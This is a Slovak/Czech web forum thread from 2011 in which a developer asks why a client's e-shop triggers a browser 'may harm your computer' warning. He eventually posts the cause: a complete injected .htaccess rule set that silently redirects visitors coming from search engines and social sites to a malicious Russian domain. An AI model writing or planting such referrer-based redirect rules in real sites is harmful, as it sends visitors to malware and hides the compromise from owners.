Autor | Zpráva | ||
---|---|---|---|
badyto Profil * |
Tak dnes mi volá jeden známy čo som mu robil nový eshop že miesto jeho stránky sa mu zobrazuje hláška "Visiting this site may harm your computer" atd...
Nový eshop ešte nebeží naostro, je zatiaľ v subpriečinku. Neviete mi niekto povedať kde môže byť chyba?? Ak to môžem opraviť? S takýmto problémom som sa ešte nikdy nestretol, vidím to prvý krát... Stránka je na adrese kruh.sk a nová stránka je na adrese kruh.sk/kruh Diky moc za pomoc! |
||
Joker Profil |
#2 · Zasláno: 24. 2. 2011, 13:00:47
badyto:
Pravděpodobně se dostal na nějaký blacklist phishingových stránek. To mu píše Google, nebo prohlížeč? |
||
badyto Profil * |
#3 · Zasláno: 24. 2. 2011, 13:15:18
Zobrazí sa tam hláška prehliadača, keď dám zobraziť detaily tak ma presmeruje na detaily na google kde nevidím veru žiadne detaily...
Ako sa mohol dostať na tento zoznam? Ako to môžem odstrániť? |
||
Chamurappi Profil |
#4 · Zasláno: 24. 2. 2011, 13:18:06
Reaguji na badyta:
Máte na webu virus — co s tím? „Neviete mi niekto povedať kde môže byť chyba??“ Když přesměrováváš nejzranitelnější používaný prohlížeč někam pryč, je to nejen hrubě neseriózní, ale i podezřelé. Proč by nemělo být? Ví majitel e-shopu, že každého patnáctého zákazníka seřváváš a vyháníš? |
||
badyto Profil * |
#5 · Zasláno: 24. 2. 2011, 13:36:11
Ahaaa...
No ten redirect pre IE6 na browserchoice.eu som možno trošku prehnal... :-] Asi som bol moc rozvášnený keď som písal ten header... Vďaka, skúsim dať teraz request na review. Ale aj tak ma táto situácia hnevá, akoby mi sedel neaký big brother za chrbtom... |
||
badyto Profil * |
No tak nakoniec bol inde pes zakopaný.
Toto som našiel v súbore .htaccess: RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://gharibola.ru/in.cgi?7 [R=301,L] |
||
Časová prodleva: 14 let
|
0